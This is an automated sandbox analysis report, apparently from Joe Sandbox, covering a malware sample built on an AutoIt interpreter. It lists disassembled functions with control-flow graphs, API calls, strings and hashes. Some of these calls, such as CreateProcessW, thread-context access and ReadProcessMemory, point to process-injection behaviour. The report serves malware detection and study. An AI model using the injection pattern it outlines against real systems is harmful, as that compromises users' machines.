                                                                                                                      control_flow_graph 983 1108460-110850e call 1105e70 986 1108515-110853b call 1109370 CreateFileW 983->986 989 1108542-1108552 986->989 990 110853d 986->990 995 1108554 989->995 996 1108559-1108573 VirtualAlloc 989->996 991 110868d-1108691 990->991 993 11086d3-11086d6 991->993 994 1108693-1108697 991->994 997 11086d9-11086e0 993->997 998 11086a3-11086a7 994->998 999 1108699-110869c 994->999 995->991 1002 1108575 996->1002 1003 110857a-1108591 ReadFile 996->1003 1004 11086e2-11086ed 997->1004 1005 1108735-110874a 997->1005 1000 11086b7-11086bb 998->1000 1001 11086a9-11086b3 998->1001 999->998 1008 11086cb 1000->1008 1009 11086bd-11086c7 1000->1009 1001->1000 1002->991 1010 1108593 1003->1010 1011 1108598-11085d8 VirtualAlloc 1003->1011 1012 11086f1-11086fd 1004->1012 1013 11086ef 1004->1013 1006 110875a-1108762 1005->1006 1007 110874c-1108757 VirtualFree 1005->1007 1007->1006 1008->993 1009->1008 1010->991 1014 11085da 1011->1014 1015 11085df-11085fa call 11095c0 1011->1015 1016 1108711-110871d 1012->1016 1017 11086ff-110870f 1012->1017 1013->1005 1014->991 1023 1108605-110860f 1015->1023 1018 110872a-1108730 1016->1018 1019 110871f-1108728 1016->1019 1021 1108733 1017->1021 1018->1021 1019->1021 1021->997 1024 1108611-1108640 call 11095c0 1023->1024 1025 1108642-1108656 call 11093d0 1023->1025 1024->1023 1031 1108658 1025->1031 1032 110865a-110865e 1025->1032 1031->991 1033 1108660-1108664 CloseHandle 1032->1033 1034 110866a-110866e 1032->1034 1033->1034 1035 1108670-110867b VirtualFree 1034->1035 1036 110867e-1108687 1034->1036 1035->1036 1036->986 1036->991
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01108531
                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01108757
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2176622884.0000000001105000.00000040.00000020.00020000.00000000.sdmp, Offset: 01105000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1105000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFileFreeVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 204039940-0
                                                                                                                      • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                      • Instruction ID: 84f15dd4a1be7057decb65d0c87056a4218093c231d69a85bba13be8d8beed01
                                                                                                                      • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                      • Instruction Fuzzy Hash: 8CA12974E04209EBDB19CFA4C894BEEBBB5BF48304F208159E205BB2C1D7B59A41CF65
                                                                                                                      Function 004C39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1114 4c39d5-4c3a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004C3A03
                                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004C3A24
                                                                                                                      • ShowWindow.USER32(00000000,?,?), ref: 004C3A38
                                                                                                                      • ShowWindow.USER32(00000000,?,?), ref: 004C3A41
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CreateShow
                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                                      • Opcode ID: 2cf9ecf1925b5b87f68d5d17e0e00b9a0862be442f7600541bdaa674436926fb
                                                                                                                      • Instruction ID: 5d2891618285b6acad127223cd57644408edeceaa17ecb8d491b8ce53e013e8e
                                                                                                                      • Opcode Fuzzy Hash: 2cf9ecf1925b5b87f68d5d17e0e00b9a0862be442f7600541bdaa674436926fb
                                                                                                                      • Instruction Fuzzy Hash: D0F03A786402907EEA3157276C08E6B3E7DE7D7F54B00102ABD01B2170DA650804EBB0
                                                                                                                      Function 01108220 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147fileCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1467 1108220-1108356 call 1105e70 call 1108110 CreateFileW 1474 1108358 1467->1474 1475 110835d-110836d 1467->1475 1476 110840d-1108412 1474->1476 1478 1108374-110838e VirtualAlloc 1475->1478 1479 110836f 1475->1479 1480 1108390 1478->1480 1481 1108392-11083a9 ReadFile 1478->1481 1479->1476 1480->1476 1482 11083ab 1481->1482 1483 11083ad-11083e7 call 1108150 call 1107110 1481->1483 1482->1476 1488 1108403-110840b ExitProcess 1483->1488 1489 11083e9-11083fe call 11081a0 1483->1489 1488->1476 1489->1488
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 01108110: Sleep.KERNELBASE(000001F4), ref: 01108121
                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0110834C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2176622884.0000000001105000.00000040.00000020.00020000.00000000.sdmp, Offset: 01105000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1105000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFileSleep
                                                                                                                      • String ID: HNB7G8A8XIJ9UUOJMAL0Q
                                                                                                                      • API String ID: 2694422964-1569751964
                                                                                                                      • Opcode ID: 7ed7585d8a602350a693a7882da7bf79b44b7b298ab16455a8ba58e1ce68258f
                                                                                                                      • Instruction ID: 0087035c0a26c7b0cb71292cc0db1ba0496ce75c00b3f8627167cf0324ba7e79
                                                                                                                      • Opcode Fuzzy Hash: 7ed7585d8a602350a693a7882da7bf79b44b7b298ab16455a8ba58e1ce68258f
                                                                                                                      • Instruction Fuzzy Hash: 8D51B630D04248DAEF16DBF4D854BEEBB75AF19304F044198E248BB2C1C7B91B49CBA6
                                                                                                                      Function 004C407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1491 4c407c-4c4092 1492 4c416f-4c4173 1491->1492 1493 4c4098-4c40ad call 4c7a16 1491->1493 1496 4fd3c8-4fd3d7 LoadStringW 1493->1496 1497 4c40b3-4c40d3 call 4c7bcc 1493->1497 1500 4fd3e2-4fd3fa call 4c7b2e call 4c6fe3 1496->1500 1497->1500 1501 4c40d9-4c40dd 1497->1501 1510 4c40ed-4c416a call 4e2de0 call 4c454e call 4e2dbc Shell_NotifyIconW call 4c5904 1500->1510 1513 4fd400-4fd41e call 4c7cab call 4c6fe3 call 4c7cab 1500->1513 1503 4c4174-4c417d call 4c8047 1501->1503 1504 4c40e3-4c40e8 call 4c7b2e 1501->1504 1503->1510 1504->1510 1510->1492 1513->1510
                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 004FD3D7
                                                                                                                        • Part of subcall function 004C7BCC: _memmove.LIBCMT ref: 004C7C06
                                                                                                                      • _memset.LIBCMT ref: 004C40FC
                                                                                                                      • _wcscpy.LIBCMT ref: 004C4150
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 004C4160
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                      • String ID: Line:
                                                                                                                      • API String ID: 3942752672-1585850449
                                                                                                                      • Opcode ID: 87f494e7936a1c15c460a60f074f04b70299719a4eb5298bcfc489852dd9eace
                                                                                                                      • Instruction ID: acda2659a8ffe0986cc56a22479392117403bc79c21dffecf2f4151b75c20f5f
                                                                                                                      • Opcode Fuzzy Hash: 87f494e7936a1c15c460a60f074f04b70299719a4eb5298bcfc489852dd9eace
                                                                                                                      • Instruction Fuzzy Hash: 3E31D4790083046FD3A0EB61DC46FEB77D8AF54318F10451FFA8592191EF78A648CB8A
                                                                                                                      Function 004C686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 004C4E0F
                                                                                                                      • _free.LIBCMT ref: 004FE263
                                                                                                                      • _free.LIBCMT ref: 004FE2AA
                                                                                                                        • Part of subcall function 004C6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 004C6BAD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                      • API String ID: 2861923089-1757145024
                                                                                                                      • Opcode ID: 66927ff4ee5fef82d4874c1c960a52dc0cee883dc0932ecaeb9502b6fa13fbbd
                                                                                                                      • Instruction ID: dad220e20fdcda752ddd7bba59a41eeb64340f63d5def9e8df8f2ae010515e4b
                                                                                                                      • Opcode Fuzzy Hash: 66927ff4ee5fef82d4874c1c960a52dc0cee883dc0932ecaeb9502b6fa13fbbd
                                                                                                                      • Instruction Fuzzy Hash: 26919F7190022D9FCF04EFA6CC519EEB7B4FF05315B00446EF916AB2A1DB78A941CB58
                                                                                                                      Function 004C35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004C35A1,SwapMouseButtons,00000004,?), ref: 004C35D4
                                                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,004C35A1,SwapMouseButtons,00000004,?,?,?,?,004C2754), ref: 004C35F5
                                                                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,004C35A1,SwapMouseButtons,00000004,?,?,?,?,004C2754), ref: 004C3617
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                      • String ID: Control Panel\Mouse
                                                                                                                      • API String ID: 3677997916-824357125
                                                                                                                      • Opcode ID: 9424e7f48bdc1611894e789c278e972af85e1a76be385aea8578bc400294cd5b
                                                                                                                      • Instruction ID: fd9632a426b02bfdae084eacd3b6613ecb790fbf93cb3d348a4ff452d01b1196
                                                                                                                      • Opcode Fuzzy Hash: 9424e7f48bdc1611894e789c278e972af85e1a76be385aea8578bc400294cd5b
                                                                                                                      • Instruction Fuzzy Hash: 00114879610208BFDB20CF68DC44EFFB7B8EF45745F01846AE809D7210D2729E44A764
                                                                                                                      Function 01107110 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 011078CB
                                                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01107961
                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01107983
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2176622884.0000000001105000.00000040.00000020.00020000.00000000.sdmp, Offset: 01105000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1105000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2438371351-0
                                                                                                                      • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                                                                      • Instruction ID: e6c48845709cd722acc51f560fef55472e404aed9240ffd807f2e85e378cf66a
                                                                                                                      • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                                                                      • Instruction Fuzzy Hash: 2262FC30E14658DBEB29DBA4C850BDEB772EF58300F1091A9D10DEB2D0E7B59E81CB59
                                                                                                                      Function 0052955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C4EE5: _fseek.LIBCMT ref: 004C4EFD
                                                                                                                        • Part of subcall function 00529734: _wcscmp.LIBCMT ref: 00529824
                                                                                                                        • Part of subcall function 00529734: _wcscmp.LIBCMT ref: 00529837
                                                                                                                      • _free.LIBCMT ref: 005296A2
                                                                                                                      • _free.LIBCMT ref: 005296A9
                                                                                                                      • _free.LIBCMT ref: 00529714
                                                                                                                        • Part of subcall function 004E2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,004E9A24), ref: 004E2D69
                                                                                                                        • Part of subcall function 004E2D55: GetLastError.KERNEL32(00000000,?,004E9A24), ref: 004E2D7B
                                                                                                                      • _free.LIBCMT ref: 0052971C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1552873950-0
                                                                                                                      • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                                                      • Instruction ID: d0f67a45fbc1c4e92bcfa0e2ec4b2442385dafefd216030eeb4706506d6838b5
                                                                                                                      • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                                                      • Instruction Fuzzy Hash: 9A517FB1D04259ABDF249F65DC81A9EBB79FF89304F00049EF209A3381DB755A80CF58
                                                                                                                      Function 004E470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2782032738-0
                                                                                                                      • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                      • Instruction ID: 03405eb56a4a3c23a167d5c7c56eb4aab19b38c85c0a171b7fbd43371120224b
                                                                                                                      • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                      • Instruction Fuzzy Hash: 3841C574A007C59BDB189E6BC88096F77A6BFC2366F14853FE41587740D778DD418B88
                                                                                                                      Function 004C44A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 004C44CF
                                                                                                                        • Part of subcall function 004C407C: _memset.LIBCMT ref: 004C40FC
                                                                                                                        • Part of subcall function 004C407C: _wcscpy.LIBCMT ref: 004C4150
                                                                                                                        • Part of subcall function 004C407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 004C4160
                                                                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 004C4524
                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004C4533
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 004FD4B9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1378193009-0
                                                                                                                      • Opcode ID: d1f993409fe328e06dbd9d9d15e63f442c67f826104fa7ae352071446cd2b20e
                                                                                                                      • Instruction ID: 8cd298e9034cf19f128eab4c750843450835a9ac8c04ff2822c165e82124f15a
                                                                                                                      • Opcode Fuzzy Hash: d1f993409fe328e06dbd9d9d15e63f442c67f826104fa7ae352071446cd2b20e
                                                                                                                      • Instruction Fuzzy Hash: B821F578904798AFE7728B248855FF7BBEC9B12308F04009FE79A56241C7786988DB56
                                                                                                                      Function 004C4C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: AU3!P/U$EA06
                                                                                                                      • API String ID: 4104443479-101426668
                                                                                                                      • Opcode ID: 77876eb2a1611d6f54a1f6ab2fb5bda71d9cebfa076a3fd009f2de6f8225e3c0
                                                                                                                      • Instruction ID: 0db2a6198e9735554670cdb989f92558af4bc1737aaaf6667da5bfcee3ffed56
                                                                                                                      • Opcode Fuzzy Hash: 77876eb2a1611d6f54a1f6ab2fb5bda71d9cebfa076a3fd009f2de6f8225e3c0
                                                                                                                      • Instruction Fuzzy Hash: 38419E39A0015857DF616B548A71FBF7FA29BC1314F28447FEC8397382D62C8D4583AA
                                                                                                                      Function 004C7285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 004FEA39
                                                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 004FEA83
                                                                                                                        • Part of subcall function 004C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004C4743,?,?,004C37AE,?), ref: 004C4770
                                                                                                                        • Part of subcall function 004E0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004E07B0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                      • String ID: X
                                                                                                                      • API String ID: 3777226403-3081909835
                                                                                                                      • Opcode ID: 865328346820c33d09fe027a9c10051ca9757c29b79bab232fdfd19c894e128e
                                                                                                                      • Instruction ID: 139dc3b366c5b6ee1668a91d98a261e06e5c2f866046e097f10ffe7b03914d57
                                                                                                                      • Opcode Fuzzy Hash: 865328346820c33d09fe027a9c10051ca9757c29b79bab232fdfd19c894e128e
                                                                                                                      • Instruction Fuzzy Hash: E221C674A002489BCB419F95DC49BEE7BF8AF49319F00805EE508B7241DFF85989DFA5
                                                                                                                      Function 005298E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 005298F8
                                                                                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0052990F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Temp$FileNamePath
                                                                                                                      • String ID: aut
                                                                                                                      • API String ID: 3285503233-3010740371
                                                                                                                      • Opcode ID: 1838f867500d3f756c44be9ea9f6164eb2f79aae258a32637dfd9b46365f1641
                                                                                                                      • Instruction ID: a171e6c6ba69427557f003d97b57de85bcf6b1f549435cf5b23c54d2f51b8707
                                                                                                                      • Opcode Fuzzy Hash: 1838f867500d3f756c44be9ea9f6164eb2f79aae258a32637dfd9b46365f1641
                                                                                                                      • Instruction Fuzzy Hash: FCD05E7D58430DABDB509BA4EC0EFEA7B3CE714704F0046B1BA54910A1EAB09598AB91
                                                                                                                      Function 0053CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
